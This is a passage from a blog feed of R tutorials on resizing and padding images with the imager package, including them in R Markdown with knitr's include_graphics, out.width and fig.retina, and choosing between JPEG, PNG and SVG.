&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;original &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load.image&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dim&lt;/span&gt;(original)[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;d
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 4409 3307&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As you might have guessed, the dimensions are far larger than required,
4409px by 3307px instead of 400px square. This, in turn, corresponds to
an overly large file size&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fs&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file_info&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office.jpeg&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;size
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3.4M&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;My general rule of thumb, is&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;don’t lose sleep about images less than 200kb&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Also, as the original image isn’t square, we can’t just squash the image
into a square box, as this will distort the picture.&lt;/p&gt;
&lt;p&gt;Instead, we’ll scale one dimension to match 400px&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(d &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;img &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;resize&lt;/span&gt;(original,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;width&lt;/span&gt;(original) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; scale,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;height&lt;/span&gt;(original) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; scale,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; interpolation_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;img
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Image. Width: 399 pix Height: 300 pix Depth: 1 Colour channels: 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;then pad the other dimension with a white background&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;square_img &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pad&lt;/span&gt;(img,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nPix &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;height&lt;/span&gt;(img),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; val &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;white&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;save.image&lt;/span&gt;(square_img, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;square_img
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Image. Width: 399 pix Height: 400 pix Depth: 1 Colour channels: 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As we have scaled the image to have the correct dimensions, the file
size is also smaller&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fs&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file_info&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;size
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 24.4K&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-knitr-include-graphics-external"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="including-images-in-an-r-markdown-file"&gt;Including images in an R markdown File&lt;/h2&gt;
&lt;p&gt;We can include an image using {knitr} and the &lt;code&gt;include_graphics()&lt;/code&gt;
function, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Typically the chunk would use &lt;code&gt;echo = FALSE&lt;/code&gt; as we don’t want to see the
actual R code. As the image isn’t being generated by R, the chunk
arguments &lt;code&gt;fig.width&lt;/code&gt; and &lt;code&gt;fig.height&lt;/code&gt; are redundant here - these
arguments only affect graphics that are &lt;em&gt;generated&lt;/em&gt; by R.&lt;/p&gt;
&lt;p&gt;There are four core arguments for manipulating how and where the image
is specified&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;fig.align&lt;/code&gt;. Default &lt;code&gt;left&lt;/code&gt;. In this page, I’ve set that to
&lt;code&gt;center&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;output.width&lt;/code&gt; &amp;amp; &lt;code&gt;output.height&lt;/code&gt; control the output width / height,
in pixels or percentages. The &lt;code&gt;%&lt;/code&gt; refers to the percent of the HTML
container.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.retina&lt;/code&gt; takes a value &lt;code&gt;1&lt;/code&gt; or &lt;code&gt;2&lt;/code&gt;, with the default being &lt;code&gt;2&lt;/code&gt;
(discussed below)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The arguments to control the output width / height are &lt;code&gt;output.width&lt;/code&gt; /
&lt;code&gt;output.height&lt;/code&gt;, which accept sizes as pixels or percentages, using the
string &lt;code&gt;%&lt;/code&gt; or &lt;code&gt;px&lt;/code&gt; as a suffix. The &lt;code&gt;%&lt;/code&gt; refers to the percent of the
HTML container. The crucial thing to note is that we if we size the
width &amp;amp; height smaller than the actual image, then the browser will
scale the image, but image will still be the same size, potentially
impacting page speeds.&lt;/p&gt;
&lt;p&gt;Setting &lt;code&gt;out.width=&amp;quot;200px&amp;quot;&lt;/code&gt; and &lt;code&gt;fig.retina=1&lt;/code&gt; (we’ll cover retina
below), will put our &lt;code&gt;400px&lt;/code&gt; square image in a &lt;code&gt;200px&lt;/code&gt; box. If you right
click on the image and select &lt;em&gt;View Image&lt;/em&gt;, you’ll see that the image is
large than the display below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# out.width=&amp;#34;200px&amp;#34;, fig.retina = 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office_square.jpeg" title="The JR office at 200px" alt="The JR office at 200px" style="width:200px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Setting &lt;code&gt;out.width=&amp;quot;400px&amp;quot;&lt;/code&gt; and &lt;code&gt;fig.retina=1&lt;/code&gt; displays the 400px image
in a 400px box (depending on your screen).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# out.width=&amp;#34;400px&amp;#34;, fig.retina = 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office_square.jpeg" title="The JR office at 400px" alt="The JR office at 400px" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;When thinking about images on web-pages, the main things to consider are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;figures dimensions: do they match your HTML box&lt;/li&gt;
&lt;li&gt;file size: too large and your page speed will become too slow.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the above example, &lt;code&gt;office_square.jpeg&lt;/code&gt; is less 30KB and has the
correct dimensions. If the file is only 30KB, life is too short to worry
about it being too large. However, the original image, &lt;code&gt;offce.jpeg&lt;/code&gt; was
3.4MB. This would have a detrimental effect on download speeds and just
annoy viewers.&lt;/p&gt;
&lt;p&gt;My rough rule of thumb is not to worry about image sizes on a page, if
the total size of all images is less than 1MB. For blog posts, I rarely
worry. However, for our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course
pages&lt;/a&gt; that has
images associated with our training courses, then a little more care
needs to be taken.&lt;/p&gt;
&lt;h2 id="the-retina-setting"&gt;The Retina Setting&lt;/h2&gt;
&lt;p&gt;As we discussed in previous blog posts, the argument &lt;code&gt;fig.retina&lt;/code&gt; allows
you to produce a figure that looks crisper on higher retina displays.
When we create an R graphic, &lt;code&gt;fig.retina&lt;/code&gt; automatically doubles the
resolution. To achieve this improved quality in external graphics, we
need to double the dimensions of the image we wish to include. In our
example above, this would mean creating an image of 800px by 800px to
put into our 400px by 400px box, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Double the size for retina&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(d &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;img &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;resize&lt;/span&gt;(original,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;width&lt;/span&gt;(original) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; scale,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;height&lt;/span&gt;(original) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; scale,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; interpolation_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;square_img &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pad&lt;/span&gt;(img,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nPix &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;height&lt;/span&gt;(img),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; val &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;white&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;save.image&lt;/span&gt;(square_img, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square-retina.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In both {knitr} and {rmarkdown}, the default value of &lt;code&gt;fig.retina&lt;/code&gt; is 2.&lt;/p&gt;
&lt;p&gt;When we omit the &lt;code&gt;out.width&lt;/code&gt; the image &lt;code&gt;width&lt;/code&gt; output is the the minimum
of the&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the HTML container&lt;/li&gt;
&lt;li&gt;the width of the image / &lt;code&gt;fig.retina&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Hence, if we have a chuck with no options, this figure&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Image is 400px, output at 200px due to fig.retina=2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office_square.jpeg" title="Image with fig.retina=1" alt="Image with fig.retina=1" style="width:200px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;is output at 200px wide, while the retina image is output at 400px&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Image is 800px, output at 400px due to fig.retina=2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square-retina.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office_square-retina.jpeg" title="Image with fig.retina=2" alt="Image with fig.retina=2" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;h2 id="resizing-your-image"&gt;Resizing your image&lt;/h2&gt;
&lt;p&gt;The eagle eyed readers amongst you will have noticed that we slipped an
additional value in the &lt;code&gt;imager::resize()&lt;/code&gt; function above,
&lt;code&gt;interpolation_type = 6&lt;/code&gt;. Like most users of software, I prefer keeping
values to the their default, however, in this case the default produced
terrible results.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;interpolation_type&lt;/code&gt; argument controls the method of interpolation.
The default value of &lt;code&gt;1&lt;/code&gt; corresponds to nearest-neighbour interpolation,
&lt;code&gt;5&lt;/code&gt; corresponds to cubic interpolation (which is the default value the
&lt;a href="https://www.gimp.org/" rel="external"&gt;Gimp&lt;/a&gt; uses), and &lt;code&gt;6&lt;/code&gt; to lanczos.&lt;/p&gt;
&lt;p&gt;According to this
&lt;a href="https://graphicdesign.stackexchange.com/questions/26385/difference-between-none-linear-cubic-and-sinclanczos3-interpolation-in-image" rel="external"&gt;stackoverflow&lt;/a&gt;
answer,&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;(lanczos) is much like cubic except that instead of blurring, it
(lanczos) creates a “ringing” pattern. The benefit is that it can
handle detailed graphics without blurring like the cubic filters.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If we put the output of each method side-by-side, the nearest-neighbour
version doesn’t capture the lines quite as well as Lanczos&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/combined.jpeg" title="Comparison of scaling methods." alt="Comparison of scaling methods." style="display: block; margin: auto;" /&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/knitr-include-graphics-external/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Selecting the correct image file type</title><link>https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/</link><pubDate>Fri, 19 Feb 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/featured-1.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our four part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Specifying the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct figure dimension&lt;/a&gt; in {knitr}.&lt;/li&gt;
&lt;li&gt;Part 2: What &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;image format&lt;/a&gt; should you use for graphics (this post).&lt;/li&gt;
&lt;li&gt;Part 3: Including &lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/" rel="external"&gt;external graphics&lt;/a&gt; in your document.&lt;/li&gt;
&lt;li&gt;Part 4: Setting default {knitr} &lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;options&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There are (at least) three file formats to choose from: JPEG, PNG and SVG.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attribute&lt;/th&gt;
&lt;th&gt;JPEG&lt;/th&gt;
&lt;th&gt;PNG&lt;/th&gt;
&lt;th&gt;SVG&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Type&lt;/td&gt;
&lt;td&gt;Raster&lt;/td&gt;
&lt;td&gt;Raster&lt;/td&gt;
&lt;td&gt;Vector&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Transparency&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Animation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lossy&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Recommended&lt;/td&gt;
&lt;td&gt;Occasionally&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Often&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;If you are reading this via a syndication site, be sure to go the &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;original post&lt;/a&gt; for updated links.&lt;/p&gt;
&lt;h3 id="jpeg-images"&gt;JPEG Images&lt;/h3&gt;
&lt;p&gt;As the JPEG compression algorithm significantly reduces file size, JPEG files are ubiquitous across the web.
If you take a photo on your camera, it&amp;rsquo;s almost certainly using a JPEG storage format.
Historically the file extension was &lt;code&gt;.jpg&lt;/code&gt; as Microsoft Windows only handled
three character file extensions (also &lt;code&gt;.htm&lt;/code&gt; vs &lt;code&gt;.html&lt;/code&gt;).
But today both extensions are used (personally I prefer &lt;code&gt;.jpeg&lt;/code&gt;, but I&amp;rsquo;m not very consistent if I&amp;rsquo;m
totally honest).&lt;/p&gt;
&lt;p&gt;If you did a little Googling on which file format to use for images, then the answer you
would come across is that JPEG&amp;rsquo;s are the default choice.
But remember, figures are different from standard images! R figures have
text, straight lines, lots of white space, and perhaps transparency.&lt;/p&gt;
&lt;p&gt;However,&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;JPEGs don&amp;rsquo;t support transparency.&lt;/li&gt;
&lt;li&gt;The algorithm used to compress a JPEG image is &lt;a href="https://en.m.wikipedia.org/wiki/Discrete_cosine_transform" rel="external"&gt;discrete cosine transform (DCT)&lt;/a&gt;.
Essentially, similar pixels within an image are merged.
However, this averaging process means that the method is lossy, i.e. by storing the image
as a JPEG, we are losing information.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So in general don&amp;rsquo;t use JPEGs. The only exception might be when you have a &amp;ldquo;photograph-type&amp;rdquo;
plot, such as a detailed contour or heatmap. You would only consider this, however, if the file
size of the PNG was large.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-knitr-image-png-jpeg-svg-rmarkdown"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="portable-network-graphics-pngs"&gt;Portable Network Graphics (PNGs)&lt;/h3&gt;
&lt;p&gt;A Portable Network Graphics file (PNG) is a raster file format that uses lossless compression.
It was originally created as a replacement for the GIF, but unlike GIFs, PNG files
don&amp;rsquo;t support animations.&lt;/p&gt;
&lt;p&gt;While the PNGs file size is a little larger than JPEGs, it is usually the better default option. For a &lt;a href="https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/" rel="external"&gt;nicer&lt;/a&gt;, smoother image, you should use &lt;code&gt;type = &amp;quot;cairo-png&amp;quot;&lt;/code&gt; when creating a &lt;code&gt;png&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The size of a PNG can often be reduced using the &lt;a href="http://optipng.sourceforge.net/" rel="external"&gt;optipng&lt;/a&gt;
